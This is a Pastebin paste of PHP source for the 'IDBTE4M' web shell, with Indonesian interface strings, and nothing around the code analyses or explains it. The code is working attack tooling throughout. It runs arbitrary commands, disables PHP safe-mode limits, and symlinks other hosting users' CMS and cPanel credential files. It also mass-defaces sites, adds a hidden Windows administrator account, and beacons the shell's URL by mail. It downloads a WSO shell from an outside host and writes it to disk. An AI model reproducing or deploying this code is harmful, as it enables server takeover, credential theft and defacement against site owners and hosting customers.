API tools faq
paste
Advertisement
Guest User

leaked shell

a guest
Jan 8th, 2018
199
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.78 KB | None | 0 0
raw download clone embed print report
  1. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  2. <center>
  3. <?php
  4. @ini_set('output_buffering', 0);
  5. @ini_set('display_errors', 0);
  6. set_time_limit(0);
  7. $asui = getcwd() . "/";
  8. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  9. $ini = "fopen";
  10. $fw = "fwrite";
  11. $ada = "function_exists";
  12. $crot = "shell_exec";
  13. if (isset($_POST['cmd'])) {
  14. $mulai = $ini('php.ini', 'w');
  15. $buat = " safe_mode = OFF n
  16. disable_functions = NONE n
  17. safe_mode_gid = OFF n
  18. open_basedir = OFF n
  19. register_globals = ON n
  20. exec = ON n
  21. shell_exec = ON n";
  22. $fw($mulai, $buat);
  23. if ($ada('shell_exec')) {
  24. $lihat = $_POST['cmd'];
  25. $hasil = $crot("$lihat");
  26. echo "<pre>$hasil</pre>";
  27. }
  28.  
  29. }
  30.  
  31. if($_GET['do'] == 'tolls') {
  32. echo '<form method="post">
  33. Hasilnya Di Bawah Boss .....<br>
  34. <br>
  35. <input type="submit" name="bn" value="WSO Shell">
  36. <input type="submit" name="shel" value="IDBTE4M SHELL">
  37. <input type="submit" name="ma" value="MAILER">
  38. <input type="submit" name="ws" value="WHMCS KILLER">
  39. </form>';
  40. }
  41. if($_GET['do'] == 'config') {
  42. @ini_set('max_execution_time',0);
  43. @ini_set('display_errors', 0);
  44. @ini_set('file_uploads',1);
  45. echo '<form method="POST"><textarea cols="30" name="passwd" rows="10">';
  46. $uSr=file("/etc/passwd");
  47. foreach($uSr as $usrr) {
  48. $str=explode(":",$usrr); echo $str[0]."\n"; }
  49. echo'</textarea><br><input type="hidden" class="input" name="folfig" value="taek" size=40 />
  50. <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
  51. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>';}
  52. if ($_POST['conf']) {
  53. $folfig = $_POST['folfig']; $type = $_POST['type'];
  54. @mkdir($folfig, 0755);
  55. @chdir($folfig);
  56. $htaccess="
  57. Options Indexes FollowSymLinks
  58. \nDirectoryIndex .my.cnf
  59. \nAddType txt .php
  60. \nAddType txt .my.cnf
  61. \nAddType txt .accesshash
  62. \nAddHandler txt .php
  63. \nAddHandler txt .cnf
  64. \nAddHandler txt .accesshash
  65. ";
  66. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  67. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
  68. foreach($passwd as $pwd){ $user=trim($pwd);
  69. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
  70. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
  71. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
  72. @symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
  73. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
  74. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
  75. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
  76. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
  77. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
  78. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
  79. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
  80. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
  81. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
  82. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
  83. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
  84. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
  85. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
  86. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
  87. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
  88. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
  89. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
  90. @symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
  91. @symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
  92. @symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
  93. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
  94. @symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
  95. @symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
  96. @symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
  97. @symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
  98. @symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
  99. @symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
  100. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
  101. @symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
  102. @symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
  103. @symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
  104. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
  105. @symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
  106. @symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
  107. echo '<center>Selesai mas/mba bro untuk melihat hasilnya klik -> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
  108.  
  109. }
  110. }
  111. if($_GET['do'] == 'mass_deface') {
  112. function sabun_massal($dir,$namafile,$isi_script) {
  113. if(is_writable($dir)) {
  114. $dira = scandir($dir);
  115. foreach($dira as $dirb) {
  116. $dirc = "$dir/$dirb";
  117. $lokasi = $dirc.'/'.$namafile;
  118. if($dirb === '.') {
  119. file_put_contents($lokasi, $isi_script);
  120. } elseif($dirb === '..') {
  121. file_put_contents($lokasi, $isi_script);
  122. } else {
  123. if(is_dir($dirc)) {
  124. if(is_writable($dirc)) {
  125. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  126. file_put_contents($lokasi, $isi_script);
  127. $idx = sabun_massal($dirc,$namafile,$isi_script);
  128. }
  129. }
  130. }
  131. }
  132. }
  133. }
  134. function sabun_biasa($dir,$namafile,$isi_script) {
  135. if(is_writable($dir)) {
  136. $dira = scandir($dir);
  137. foreach($dira as $dirb) {
  138. $dirc = "$dir/$dirb";
  139. $lokasi = $dirc.'/'.$namafile;
  140. if($dirb === '.') {
  141. file_put_contents($lokasi, $isi_script);
  142. } elseif($dirb === '..') {
  143. file_put_contents($lokasi, $isi_script);
  144. } else {
  145. if(is_dir($dirc)) {
  146. if(is_writable($dirc)) {
  147. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  148. file_put_contents($lokasi, $isi_script);
  149. }
  150. }
  151. }
  152. }
  153. }
  154. }
  155. if($_POST['start']) {
  156. if($_POST['tipe_sabun'] == 'mahal') {
  157. echo "<div style='margin: 5px auto; padding: 5px'>";
  158. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  159. echo "</div>";
  160. } elseif($_POST['tipe_sabun'] == 'murah') {
  161. echo "<div style='margin: 5px auto; padding: 5px'>";
  162. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  163. echo "</div>";
  164. }
  165. } else {
  166. echo "<center>";
  167. echo "<form method='post'>
  168. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  169. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  170. <font style='text-decoration: underline;'>Folder:</font><br>
  171. <input type='text' name='d_dir' value='$asui' style='width: 450px;' height='10'><br>
  172. <font style='text-decoration: underline;'>Filename:</font><br>
  173. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  174. <font style='text-decoration: underline;'>Index File:</font><br>
  175. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IDBTE4M</textarea><br>
  176. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  177. </form></center>";
  178. }
  179. }
  180. if($_GET['do'] == 'jumping') {
  181. $i = 0;
  182. echo "<div class='margin: 5px auto;'>";
  183. if(preg_match("/hsphere/", $dir)) {
  184. $urls = explode("\r\n", $_POST['url']);
  185. if(isset($_POST['jump'])) {
  186. echo "<pre>";
  187. foreach($urls as $url) {
  188. $url = str_replace(array("http://","www."), "", strtolower($url));
  189. $etc = "/etc/passwd";
  190. $f = fopen($etc,"r");
  191. while($gets = fgets($f)) {
  192. $pecah = explode(":", $gets);
  193. $user = $pecah[0];
  194. $dir_user = "/hsphere/local/home/$user";
  195. if(is_dir($dir_user) === true) {
  196. $url_user = $dir_user."/".$url;
  197. if(is_readable($url_user)) {
  198. $i++;
  199. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
  200. if(is_writable($url_user)) {
  201. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
  202. }
  203. echo $jrw."<br>";
  204. }
  205. }
  206. }
  207. }
  208. if($i == 0) {
  209. } else {
  210. echo "<br>Total ada ".$i." Kamar di ".$ip;
  211. }
  212. echo "</pre>";
  213. } else {
  214. echo '<center>
  215. <form method="post">
  216. List Domains: <br>
  217. <textarea name="url" style="width: 500px; height: 250px;">';
  218. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  219. while($getss = fgets($fp)) {
  220. echo $getss;
  221. }
  222. echo '</textarea><br>
  223. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  224. </form></center>';
  225. }
  226. } elseif(preg_match("/vhosts/", $dir)) {
  227. $urls = explode("\r\n", $_POST['url']);
  228. if(isset($_POST['jump'])) {
  229. echo "<pre>";
  230. foreach($urls as $url) {
  231. $web_vh = "/var/www/vhosts/$url/httpdocs";
  232. if(is_dir($web_vh) === true) {
  233. if(is_readable($web_vh)) {
  234. $i++;
  235. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
  236. if(is_writable($web_vh)) {
  237. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
  238. }
  239. echo $jrw."<br>";
  240. }
  241. }
  242. }
  243. if($i == 0) {
  244. } else {
  245. echo "<br>Total ada ".$i." Kamar di ".$ip;
  246. }
  247. echo "</pre>";
  248. } else {
  249. echo '<center>
  250. <form method="post">
  251. List Domains: <br>
  252. <textarea name="url" style="width: 500px; height: 250px;">';
  253. bing("ip:$ip");
  254. echo '</textarea><br>
  255. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  256. </form></center>';
  257. }
  258. } else {
  259. echo "<pre>";
  260. $etc = fopen("/etc/passwd", "r");
  261. while($passwd = fgets($etc)) {
  262. if($passwd == '' || !$etc) {
  263. echo "<font color=red>Can't read /etc/passwd</font>";
  264. } else {
  265. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  266. foreach($user_jumping[1] as $user_idx_jump) {
  267. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  268. if(is_readable($user_jumping_dir)){
  269. $i++;
  270. $jrw = "[<font color=lime>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  271. if(is_writable($user_jumping_dir)) {
  272. $jrw = "[<font color=lime>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  273. }
  274. echo $jrw;
  275. if(function_exists('posix_getpwuid')) {
  276. $domain_jump = file_get_contents("/etc/named.conf");
  277. if($domain_jump == '') {
  278. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  279. } else {
  280. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  281. foreach($domains_jump[1] as $dj) {
  282. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  283. $user_jumping_url = $user_jumping_url['name'];
  284. if($user_jumping_url == $user_idx_jump) {
  285. echo " => ( <u>$dj</u> )<br>";
  286. break;
  287. }
  288. }
  289. }
  290. } else {
  291. echo "<br>";
  292. }
  293. }
  294. }
  295. }
  296. }
  297. if($i == 0) {
  298. } else {
  299. echo "<br>Total ada ".$i." Kamar di ".$ip;
  300. }
  301. echo "</pre>";
  302. }
  303. echo "</div>";
  304. }
  305. if($_GET['do'] == 'RDP') {
  306. echo '<p>-| Create RDP |-</p>
  307. <form action="" method="post">User :<input type="text" name="username" required> Pass :<input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value=">>">
  308. </form>
  309. </div>
  310.  
  311. <center>
  312. <div id="content-center">
  313. <p>-{ Option }-</p>
  314. <form action="" method="post"><input type="text" name="rusername" placeholder="Masukan Username"> <select name="aksi">
  315. <option value="1">Tampilkan Username</option>
  316. <option value="2">Hapus Username</option>
  317. <option value="3">Ubah Password</option>
  318. </select>
  319. <input type="hidden" name="kshell" value="2">
  320. <input type="submit" name="submit" value=">>"></form>
  321. </div>';
  322. }
  323. if($_POST['submit']){
  324. echo "<p>---------------{ INFO }---------------</p>";
  325. if($_POST['kshell']=="1"){
  326. $r_user = $_POST['username'];
  327. $r_pass = $_POST['password'];
  328. $cmd_cek_user = shell_exec("net user");
  329. if(preg_match("/$r_user/", $cmd_cek_user)){
  330. echo $gaya_root.$r_user." sudah ada".$o;
  331. }else {
  332. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
  333. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  334. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  335. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  336.  
  337. if($cmd_add_user){
  338. echo $gaya_root."<p>[add user]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
  339. }else {
  340. echo $gaya_root."<p>[add user]-> ".$r_user." <font color='red'>Gagal</font><p>".$o;
  341. }
  342. if($cmd_add_groups1){
  343. echo $gaya_root."<p>[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
  344. }else
  345. if($cmd_add_groups2){
  346. echo $gaya_root."<p>[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
  347. }else
  348. if($cmd_add_groups3){
  349. echo $gaya_root."<p>[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
  350. }else {
  351. echo $gaya_root."<p>[add localgroup]-> ".$r_user." <font color='red'>Gagal - Contact Shor7sec</font><p>".$o;
  352. }
  353. echo $gaya_root."<p>[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil</font><p>".$o;
  354.  
  355. }
  356.  
  357.  
  358.  
  359. }else if($_POST['kshell']=="2"){
  360.  
  361. if($_POST['aksi']=="1"){
  362. echo "<pre>".shell_exec("net user");
  363. }
  364. else if($_POST['aksi']=="2"){
  365. $username = $_POST['rusername'];
  366. $cmd_cek_user = shell_exec("net user");
  367. if (!empty($username)){
  368. if(preg_match("/$username/", $cmd_cek_user)){
  369. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
  370. if($cmd_add_user){
  371. echo $gaya_root."<p>[remove user]-> ".$username." <font color='greenyellow'>Berhasil</font><p>".$o;
  372. }else {
  373. echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>gagal</font><p>".$o;
  374. }
  375. }else {
  376. echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>Tidak ditemukan</font><p>".$o;
  377. }
  378. }else {
  379. echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
  380. }
  381. }
  382. else if($_POST['aksi']=="3"){
  383. $username = $_POST['rusername'];
  384. $password = "jancok";
  385. $cmd_cek_user = shell_exec("net user");
  386. if (!empty($username)){
  387. if(preg_match("/$username/", $cmd_cek_user)){
  388. $cmd_add_user = shell_exec("net user ".$username." jancok");
  389. if($cmd_add_user){
  390. echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='greenyellow'>Berhasil</font><p>".$o;
  391. }else {
  392. echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='red'>GAGAL</font><p>".$o;
  393. }
  394. }else
  395. {
  396. echo $gaya_root."<p>[PESAN]-> <font color='red'>Username Tidak Ditemukan di server</font><p>".$o;
  397. }
  398. }else
  399. {
  400. echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
  401. }
  402.  
  403. }
  404.  
  405. }
  406.  
  407. }
  408. ?>
  409. <?php
  410. @ini_set('output_buffering', 0);
  411. @ini_set('display_errors', 0);
  412. set_time_limit(0);
  413. ini_set('memory_limit', '64M');
  414. header('Content-Type: text/html; charset=UTF-8');
  415. $tujuanmail = ',';
  416. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  417. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  418. mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  419. ?>
  420. <?php
  421.  
  422.  
  423.  
  424. @ini_set('log_errors',0);
  425. @ini_set('output_buffering',0);
  426. set_time_limit(0);
  427. error_reporting(0);
  428. if(get_magic_quotes_gpc()){
  429. foreach($_POST as $key=>$value){
  430. $_POST[$key] = stripslashes($value);
  431. }
  432. }
  433. echo '<html><head>
  434. <title>-_-</title>
  435. <meta http-equiv="Content-Type" content="jpg/png; charset=utf-8"><div class="gmail_extra"><br>
  436. <link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">
  437. <body>
  438. <style type="text/css">
  439. body {
  440. background: black;
  441. color: #00FF00;
  442. font-family: monospace;
  443. }
  444.  
  445. .accessGranted {
  446. position: absolute;
  447. top: 200px;
  448. background: #333;
  449. padding: 20px;
  450. border: 1px solid #999;
  451. width: 300px;
  452. left: 50%;
  453. margin-left: -150px;
  454. text-align: center;
  455. }
  456.  
  457. .accessDenied {
  458. position: absolute;
  459. top: 200px;
  460. color: #F00;
  461. background: #511;
  462. padding: 20px;
  463. border: 1px solid #F00;
  464. width: 300px;
  465. left: 50%;
  466. margin-left: -150px;
  467. text-align: center;
  468. }
  469. #content-center {
  470. width: 400px;
  471. padding: 0px 10px 10px 10px;
  472. width: 800px;
  473. margin: 0 auto;
  474. }
  475. #content-left {
  476. margin: 0 auto;
  477. text-align: left;
  478. }
  479. #content-right {
  480. margin: 0 auto;
  481. text-align: right;
  482. }
  483. input,select,textarea{
  484. border:0;
  485. border:1px solid #900;
  486. background:black;
  487. margin:0;
  488. color: white;
  489.  
  490. padding:2px 4px;
  491. }
  492. input:hover,textarea:hover,select:hover{
  493. background:black;
  494. color: blue;
  495.  
  496. border:1px solid #f00;
  497. }
  498. a{ text-decoration:none; color:red;}
  499. </style>
  500. </head>
  501. <H1><center>-=[+] IDBTE4M SHELL V1 [+]=-</center></H1>
  502. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  503. ';
  504. echo '<tr><td>
  505. <center>
  506. <div id="content-center">
  507. <form method="post">
  508. <input type="text" name="cmd" size="30"><input type="submit" value="Command">
  509. </form>
  510. <br>
  511. + [ <a href="?"><font color="aqua">Home</font></a> ]-[ <a href="?do=jumping"><font color="aqua">Jumping</font></a> ]-[ <a href="?do=mass_deface"><font color="aqua">Mass Deface</font></a> ]-[ <a href="?do=RDP"><font color="aqua">KRDP</font></a> ]-[ <a href="?do=config"><font color="aqua">Config Grab</font></a> ]-[ <a href="?do=tolls"><font color="aqua">Auto Get Tolls</font></a> ] +
  512.  
  513. <br><br>';
  514. echo 'IDBTE4M #>';
  515. if(isset($_GET['path'])){
  516. $path = $_GET['path'];
  517. }else{
  518. $path = getcwd();
  519. }
  520. $path = str_replace('\\','/',$path);
  521. $paths = explode('/',$path);
  522.  
  523. foreach($paths as $id=>$pat){
  524. if($pat == '' && $id == 0){
  525. $a = true;
  526. echo '<a href="?path=/">/</a>';
  527. continue;
  528. }
  529. if($pat == '') continue;
  530. echo '<a href="?path=';
  531. for($i=0;$i<=$id;$i++){
  532. echo "$paths[$i]";
  533. if($i != $id) echo "/";
  534. }
  535. echo '">'.$pat.'</a>/';
  536. }
  537. echo '</td></tr><tr><td>';
  538. if(isset($_FILES['file'])){
  539. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  540. echo '<font color="green">OK COK SUKSESS !!</font><br />';
  541. }else{
  542. echo '<font color="red">ASU RAIMU ELK :P</font><br />';
  543. }
  544. }
  545. echo '<center>
  546. <form enctype="multipart/form-data" method="POST">
  547. <input type="file" name="file" />
  548. <input type="submit" value="upload" />
  549. </form>
  550. </td></tr>';
  551. if(isset($_GET['filesrc'])){
  552. echo "<tr><td>Current File : ";
  553. echo $_GET['filesrc'];
  554. echo '</tr></td></table><br />';
  555. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  556. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  557. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  558. if($_POST['opt'] == 'chmod'){
  559. if(isset($_POST['perm'])){
  560. if(chmod($_POST['path'],$_POST['perm'])){
  561. echo '<font color="green">Change Permission Done.</font><br />';
  562. }else{
  563. echo '<font color="red">Change Permission Error.</font><br />';
  564. }
  565. }
  566. echo '<form method="POST">
  567. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  568. <input type="hidden" name="path" value="'.$_POST['path'].'">
  569. <input type="hidden" name="opt" value="chmod">
  570. <input type="submit" value="Go" />
  571. </form>';
  572. }elseif($_POST['opt'] == 'rename'){
  573. if(isset($_POST['newname'])){
  574. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  575. echo '<font color="green">Change Name Done.</font><br />';
  576. }else{
  577. echo '<font color="red">Change Name Error.</font><br />';
  578. }
  579. $_POST['name'] = $_POST['newname'];
  580. }
  581. echo '<form method="POST">
  582. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  583. <input type="hidden" name="path" value="'.$_POST['path'].'">
  584. <input type="hidden" name="opt" value="rename">
  585. <input type="submit" value="Go" />
  586. </form>';
  587. }elseif($_POST['opt'] == 'edit'){
  588. if(isset($_POST['src'])){
  589. $fp = fopen($_POST['path'],'w');
  590. if(fwrite($fp,$_POST['src'])){
  591. echo '<font color="green">Edit File Done.</font><br />';
  592. }else{
  593. echo '<font color="red">Edit File Error.</font><br />';
  594. }
  595. fclose($fp);
  596. }
  597. echo '<form method="POST">
  598. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  599. <input type="hidden" name="path" value="'.$_POST['path'].'">
  600. <input type="hidden" name="opt" value="edit">
  601. <input type="submit" value="Go" />
  602. </form>';
  603. }
  604. echo '</center>';
  605. }else{
  606. echo '</table><br /><center>';
  607. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  608. if($_POST['type'] == 'dir'){
  609. if(rmdir($_POST['path'])){
  610. echo '<font color="green">Delete Dir Done.</font><br />';
  611. }else{
  612. echo '<font color="red">Delete Dir Error.</font><br />';
  613. }
  614. }elseif($_POST['type'] == 'file'){
  615. if(unlink($_POST['path'])){
  616. echo '<font color="green">Delete File Done.</font><br />';
  617. }else{
  618. echo '<font color="red">Delete File Error.</font><br />';
  619. }
  620. }
  621. }
  622. echo '</center>';
  623. $scandir = scandir($path);
  624. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  625. <tr class="first">
  626. <td><center>Name</center></td>
  627. <td><center>Size</center></td>
  628. <td><center>Permissions</center></td>
  629. <td><center>Options</center></td>
  630. </tr>';
  631.  
  632. foreach($scandir as $dir){
  633. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  634. echo "<tr>
  635. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  636. <td><center>--</center></td>
  637. <td><center>";
  638. if(is_writable("$path/$dir")) echo '<font color="aqua">';
  639. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  640. echo perms("$path/$dir");
  641. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  642.  
  643. echo "</center></td>
  644. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  645. <select name=\"opt\">
  646. <option value=\"\"></option>
  647. <option value=\"delete\">Delete</option>
  648. <option value=\"chmod\">Chmod</option>
  649. <option value=\"rename\">Rename</option>
  650. </select>
  651. <input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\">
  652. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  653. <input type=\"submit\" value=\">\" />
  654. </form></center></td>
  655. </tr>";
  656. }
  657. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  658. foreach($scandir as $file){
  659. if(!is_file("$path/$file")) continue;
  660. $size = filesize("$path/$file")/1024;
  661. $size = round($size,3);
  662. if($size >= 1024){
  663. $size = round($size/1024,2).' MB';
  664. }else{
  665. $size = $size.' KB';
  666. }
  667.  
  668. echo "<tr>
  669. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  670. <td><center>".$size."</center></td>
  671. <td><center>";
  672. if(is_writable("$path/$file")) echo '<font color="aqua">';
  673. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  674. echo perms("$path/$file");
  675. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  676. echo "</center></td>
  677. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  678. <select name=\"opt\">
  679. <option value=\"\"></option>
  680. <option value=\"delete\">Delete</option>
  681. <option value=\"chmod\">Chmod</option>
  682. <option value=\"rename\">Rename</option>
  683. <option value=\"edit\">Edit</option>
  684. </select>
  685. <input type=\"hidden\" name=\"type\" value=\"file\">
  686. <input type=\"hidden\" name=\"name\" value=\"$file\">
  687. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  688. <input type=\"submit\" value=\">\" />
  689. </form></center></td>
  690. </tr>";
  691. }
  692. echo '</table>
  693. </div>';
  694. }
  695. echo '
  696. </BODY>
  697. </HTML>';
  698. function perms($file){
  699. $perms = fileperms($file);
  700.  
  701. if (($perms & 0xC000) == 0xC000) {
  702. // Socket
  703. $info = 's';
  704. } elseif (($perms & 0xA000) == 0xA000) {
  705. // Symbolic Link
  706. $info = 'l';
  707. } elseif (($perms & 0x8000) == 0x8000) {
  708. // Regular
  709. $info = '-';
  710. } elseif (($perms & 0x6000) == 0x6000) {
  711. // Block special
  712. $info = 'b';
  713. } elseif (($perms & 0x4000) == 0x4000) {
  714. // Directory
  715. $info = 'd';
  716. } elseif (($perms & 0x2000) == 0x2000) {
  717. // Character special
  718. $info = 'c';
  719. } elseif (($perms & 0x1000) == 0x1000) {
  720. // FIFO pipe
  721. $info = 'p';
  722. } else {
  723. // Unknown
  724. $info = 'u';
  725. }
  726.  
  727. // Owner
  728. $info .= (($perms & 0x0100) ? 'r' : '-');
  729. $info .= (($perms & 0x0080) ? 'w' : '-');
  730. $info .= (($perms & 0x0040) ?
  731. (($perms & 0x0800) ? 's' : 'x' ) :
  732. (($perms & 0x0800) ? 'S' : '-'));
  733.  
  734. // Group
  735. $info .= (($perms & 0x0020) ? 'r' : '-');
  736. $info .= (($perms & 0x0010) ? 'w' : '-');
  737. $info .= (($perms & 0x0008) ?
  738. (($perms & 0x0400) ? 's' : 'x' ) :
  739. (($perms & 0x0400) ? 'S' : '-'));
  740.  
  741. // World
  742. $info .= (($perms & 0x0004) ? 'r' : '-');
  743. $info .= (($perms & 0x0002) ? 'w' : '-');
  744. $info .= (($perms & 0x0001) ?
  745. (($perms & 0x0200) ? 't' : 'x' ) :
  746. (($perms & 0x0200) ? 'T' : '-'));
  747.  
  748. return $info;
  749. }
  750. ?>
  751. <?php
  752. $sh = 'file_get_contents';
  753. if($_POST['bn']) {
  754. $cgi = 'http://freireshoes.com.br/loja/wp-admin/ww.txt';
  755. $get11 = $sh($cgi);
  756. $idbk = fopen('wp-maii.php', 'w');
  757. fwrite($idbk,$get11);
  758. fclose($idbk);
  759. {
  760. @chmod('wp-maii.php',0755);
  761. }
  762. echo "<font color='aqua'>";
  763. echo "WSO PASS jancok<br/>
  764. Silahkan kunjungi http://alamat-domain-kamu/idbte4m.cgi atau lihat hasilnya <a href='wp-maii.php' target='_blank'>DISINI</a></center></br>";
  765. echo "</font>";
  766. }
  767. echo "</font>";
  768. if($_POST['shel']) {
